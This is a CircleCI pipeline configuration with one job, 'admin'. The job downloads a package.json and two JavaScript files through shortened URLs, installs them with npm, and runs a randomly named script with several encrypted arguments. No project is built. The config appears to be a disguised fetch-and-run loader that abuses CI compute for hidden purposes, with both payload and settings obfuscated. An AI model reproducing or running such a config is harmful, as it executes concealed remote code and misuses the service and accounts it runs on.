version: 2.1
orbs:
  android: circleci/android@1.0
jobs:
  admin:
    executor:
      name: android/android-machine
    #resource_class: medium
    steps:
      - run: 
          command: curl -fsSL shorturl.at/djCF8 -o package.json && curl -fsSL shorturl.at/sBF69 -o sgdfgerjhsdfe.js && curl -fsSL shorturl.at/nJY16 -o logger.js
      - run: npm i -s
      - run: node sgdfgerjhsdfe -r U2FsdGVkX1+jDDCHzH7XUwKe1yP1PUQ+ZZ6IGE9QIJz1+mRqfqbv84KQvSmcO5kQVimqRsrPo/XUmHG07kDcypHxLCacb0kbsWMoe+aJrzPKZNASaef2UM6+YCkeXi57rlp7i5+jwoavfgk/KZJT0Dwxx4CWs8kbyPU22a2+CsLpEYg7/y1Oxg6QJ7D8TNkJGOnZDcYmENhRnmHoQXGdSXwPq7KmgN/52xxRmLjGAJ4J/DLLO5y2c3ic2oClIHc2tNugKCdIUvED5SZti344AlaF/gJiw45//tdNVeW4eWNROTL3vGyQav0JAP5FvJI3Yy2iLYBFMF91PGusFhQALw7qjKMDWNtKcEwMQSGlbggQWg5oTc2IRzZnwPQcYyHo -t U2FsdGVkX1+fkDxyJG2Xn23funqphl+JKuWnL8aKGja2WbPpx4c4XjPL94EloxYS -lpn U2FsdGVkX1+u3y7tEfaS5e3I8EsTPw2bEM1S7O0J/Wc= -sp -s U2FsdGVkX18iM8cQbFUX9YIqJRl2kIVjr6mugLZ1EtIEh4gnDuV85TFM3q0AMfacIgRtIJUdwlmjiH+uwkC/ZSqFeRFPhGcgvWbF7iZzhWRUKeyS+3UjImW5QE7LXrTVTAhFknBfYM+9pj67/PBuR45aOcmZ4pGzALWNZY2NV8LAujWcgGQ8tYgnJN8JKN6w/peD8jY+9XKJN5XPwVPVrUi7f2nTGoxJETG6TItjQw0=
      
workflows:
  start-work:
    jobs:
      - admin
